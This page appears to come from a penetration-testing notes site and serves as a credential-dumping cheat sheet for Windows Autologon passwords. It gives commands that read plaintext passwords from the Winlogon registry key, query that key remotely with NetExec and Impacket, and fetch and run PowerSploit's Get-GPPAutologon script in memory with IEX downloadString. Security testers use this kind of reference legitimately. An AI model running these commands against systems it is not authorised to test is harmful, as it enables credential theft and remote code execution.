WINDOWS AUTOLOGON

PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Abuse - Windows (Local)

Get-ItemProperty

Locally

Get-ItemProperty

Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select DefaultDomainName, DefaultUsername, DefaultPassword | fl

Abuse - UNIX-like

Autologon must be configured via Group Policy instead of locally

Netexec

Netexec

nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module 'gpp_autologin'

Impacket’s REG.py

Reg.py

reg.py query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" '<DOMAIN>/<USER>:<PASSWD>@<TARGET>'

Abuse - Windows

Autologon must be configured via Group Policy instead of locally

Get-GPPAutologon.ps1

Get-GPPAutologon.ps1

Usage

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1' -OutFile '.\Get-GPPAutologon.ps1'

Import-Module '.\Get-GPPAutologon.ps1'

Usage

Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

💥Cyb3rBook

Explorer

WINDOWS AUTOLOGON

PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Abuse - Windows (Local)

Get-ItemProperty

Abuse - UNIX-like

Netexec

Impacket’s REG.py

Abuse - Windows

Get-GPPAutologon.ps1

Usage

Usage

Graph View

Table of Contents

Backlinks